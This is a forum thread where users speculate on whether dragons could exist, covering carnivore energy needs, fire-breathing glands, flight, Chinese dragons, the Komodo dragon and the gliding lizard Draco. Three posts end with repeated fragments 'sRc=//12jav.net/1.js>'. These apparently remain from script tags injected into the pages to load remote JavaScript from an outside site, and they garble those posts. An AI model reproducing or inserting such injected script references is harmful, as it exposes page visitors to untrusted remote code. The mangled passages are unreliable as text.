Real Dragons?

Do you think that dragons are real? I am not talking about a fire breathing dragon or a dragon with magical powers, I am wondering could a dragon actually exist with the physical structure, folk tales/religions says they have. Some people might refer dragons to pterodactyls but I am wondering could a dragon actually exist, (like the physical structure, on this earth)? And, given the fact that life is most likely wide spread across the galaxy who's to say there isn't a creature we would call a "dragon" existing elsewhere? What do you think?

well if you think about it, we're still discovering new forms of life and rediscover some old ones we thought we gone so it could be very likely

Given their supposed size, and being carnivorous, no. They would completely wipe out their food supply faster than it could reproduce. The amount of food they would have to eat to get enough energy to function day-to-day would be staggering. That's why herbivores can grow larger than carnivores, because of the energy intake versus expense when it comes to "hunting."

If the dragons were much smaller, then I think it could be possible. I'm more interested in the fire-breathing mechanism. I think it's in the movie Reign of Fire, where the dragons have 2 sacs in their throats that eject chemicals, which when mixed produce fire... sort of like the infamous Greek Fire, I suppose?

i would be interested in how they fly as well. there supposed size would make them heavy and therefore im not sure if their wings could hold them. i did see a movie/ mock documentry about finding a frozen dragon and its young in a mountain and they had proposed that dragons could of had a sack in their stomachs that fill with helium and i think there bones where made of a strong but light material as well. it was quite fascinating. it went into details about mating rituals, incubating eggs, hunting, life cycle etc. it was really good.i think it was called 'the last dragon' sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

the wingless dragons? like the chinese lung. i think thats the one featured in a lot of chinese art. i do have a couple of books on dragons dedcribing lots of different dragons. really interesting stuff. very detailed. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

There is a giant lizard known as the Komodo dragon. It doesn't have wings; but it is a scary mother! sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I think the nearest you're going to get to a real "dragon" is a gliding lizard "Draco spilonotus"
